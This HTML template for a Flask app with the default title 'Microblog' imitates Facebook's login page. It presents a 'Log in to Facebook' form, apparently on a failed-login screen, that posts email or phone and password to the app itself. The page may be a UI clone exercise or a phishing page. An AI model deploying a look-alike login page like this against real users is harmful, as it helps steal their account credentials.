<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  {% if title %}
  <title>{{ title }}</title>
  {% else %}
  <title>Welcome to Microblog!</title>
  {% endif %}
  <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
  <script src="{{ url_for('static', filename='script.js') }}" defer></script>
</head>

<header class="header">
  <div class="header__inner">
    <h1 class="text-logo"><a class="text-logo__link" href="{{ url_for('index') }}">facebook</a></h1>
    <a href="#" class="signup-link signup-link--small signup-link--relative">Sign Up</a>
  </div>
</header>
<div class="failed_background">
  <div id="login_form_wrapper">
    <h2 class="tempclass1">Log in to Facebook</h2>
    <form action="{{ url_for('index') }}" method="post" novalidate>
      <div id="form-text-align">
        <input class="input2" type="email" id="email_or_phone2" placeholder="Email address or phone number"
          aria-label="Email address or phone number" name="email_phone">
        <input class="input2" type="password" id="password2" placeholder="Password" aria-label="password"
          name="password">
        <button class="login-button login-button--reposition2">Log In</button>
        <div id="or">or</div>
      </div>
    </form>
    <a class="signup-link" href="">Create New Account</a>
    <a id="forgot2" href="#">Forgotten account?</a>
  </div>
</div>